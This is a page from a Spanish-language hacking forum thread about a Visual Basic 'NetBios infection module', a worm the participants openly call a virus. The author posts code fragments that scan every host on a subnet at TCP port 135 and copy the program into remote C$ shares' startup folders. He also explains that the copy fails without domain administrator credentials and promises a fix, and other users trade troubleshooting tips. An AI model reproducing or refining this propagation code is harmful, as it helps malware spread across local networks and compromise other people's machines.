Páginas: 1 [2] 
|
 |
|
 Autor
|
Tema: [Source] NetBios infection Module (ojo que es peligroso!) (Leído 1641 veces)
|
Karcrack
 Desconectado
Mensajes: 251
Se siente observado ¬¬'
|
Esto me va a venir de perlas  . Gran aporte MadAntrax  |
|
|
|
|
En línea
|
|
|
|
Meg
Desconectado
Mensajes: 442
|
Esta vez te has lucio  , na enserio esta muy bien ese codigo... tanto estudiar en clase de redes sobre subneting y de IP,s... y ahora ya se como puedo sacar buen provecho a todo eso la verdad es k no se me habia ocurrio xDD |
|
|
|
« Última modificación: 15 Julio 2007, 17:56 por Meg »
|
En línea
|
|
|
|
3k1n0x
Desconectado
Mensajes: 325
|
yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi  , q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo.. |
|
|
|
|
En línea
|
T3fL0n -> 3k1n0x
|
|
|
|
||MadAntrax||
|
yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi , q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo.. Uaaaa, ya sé porqué no te funciona. (Ha sido un fallo mio). For i = 1 To 254 'Bucle desde X.X.X.1 hasta X.X.X.254
If WS.State <> sckClosed Then WS.CloseSck 'Si el Socket no está cerrado, lo cerramos para evitar errores.
DoEvents 'Esperamos...
WS.Connect SubNet & "." & i, 135 'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios)
[b]Sleep 500[/b] 'Esperamos 1/2 Segundo...
If WS.State = sckConnected And i <> MyHost Then 'Si el Hosts es vulnerable y el Host no es MiPC entonces...
AliveHosts = AliveHosts & i & "," ' añadimos el octeto del Host en el Array
End If 'End If
Next i Es por culpa del Sleep, esa función "duerme" todas las acciones del VB, incluido el IF que hay debajo, por eso en algunos equipos el scanning no funcionara del todo bien. Luego mejoro eso. Otro error... tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio" Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD Este fin de semana me pongo y lo arreglo, ok? Lo siento y saludos!! |
|
|
|
|
En línea
|
|
|
|
3k1n0x
Desconectado
Mensajes: 325
|
alguien a hecho algo ? nose algo para ver si funka o mandrax o alguien sabe donde esta el fallo¿
|
|
|
|
|
En línea
|
T3fL0n -> 3k1n0x
|
|
|
|
|
|
|
Karcrack
Desconectado
Mensajes: 251
Se siente observado ¬¬'
|
|
|
|
|
|
En línea
|
|
|
|
|
|
Hole_System
Desconectado
Mensajes: 124
|
Por fin le dieron resultado a este proyecto..
Saludos..
|
|
|
|
|
En línea
|
Al que por su gusto muere la muerte le sabe a gloria.
|
|
|
quat
Desconectado
Mensajes: 14
|
Ha alguo le ha funcionado? creo que esta parchaeado por xp ya, si alguno a logrado hacerlo funcionar nos serviria de ayuda que lo dijera gracias
|
|
|
|
|
En línea
|
|
|
|
el_c0c0
Desconectado
Mensajes: 30
|
tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"[/code]
Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD
no es solo ese directorio, proba con \\elip\C$\ y tambien te va a dar acceso denegado. PD: usa pipes para ver lo q "responde" cada comando saludos |
|
|
|
|
En línea
|
|
|
|
|
Páginas: 1 [2] 
|
|
|
 |
